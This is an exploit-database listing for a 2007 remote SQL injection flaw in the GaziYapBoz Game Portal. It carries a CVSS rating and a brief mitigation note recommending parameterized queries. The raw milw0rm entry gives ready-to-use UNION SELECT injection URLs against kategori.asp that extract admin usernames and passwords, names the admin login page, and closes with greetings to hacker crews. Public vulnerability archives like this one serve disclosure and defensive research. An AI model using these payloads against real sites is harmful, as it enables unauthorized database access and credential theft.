header-logo
Suggest Exploit
vendor:
GaziYapBoz Game Portal
by:
CyberGhost
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: GaziYapBoz Game Portal
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

GaziYapBoz Game Portal Remote SQL Injection Vulnerability

The vulnerability allows an attacker to perform SQL injection attacks on the GaziYapBoz Game Portal. By injecting SQL queries into certain parameters, an attacker can retrieve sensitive information from the database.

Mitigation:

To mitigate the vulnerability, the developer should use prepared statements or parameterized queries to handle user input and avoid concatenating user-supplied data into SQL queries.
Source

Exploit-DB raw data:

#Title  : GaziYapBoz Game Portal Remote SQL Injection Vulnerability
#Author : CyberGhost
#Page   : http://ucgenportal.somee.com/scriptler/gaziyapboz
#Download : http://www.aspindir.com/indir.asp?id=4765&sIslem=%DDndir

Vuln.

Username : /kategori.asp?kategori='+union+select+0,1,2,3,name,5,6,7,8,9+from+admin
Password : /kategori.asp?kategori='+union+select+0,1,2,3,password,5,6,7,8,9+from+admin

Login : /personelgirisizni.asp

====================================

Thanx : redLine - Hackinger - LiarHack - excellance - by_emR3 - kerem125 - Bolivar - Voltigore - CyberDefacer - ProfeSSionaL

And All TURKISH HACKERS

# milw0rm.com [2007-03-08]

Navigation

Suggest Exploit

Services By CQR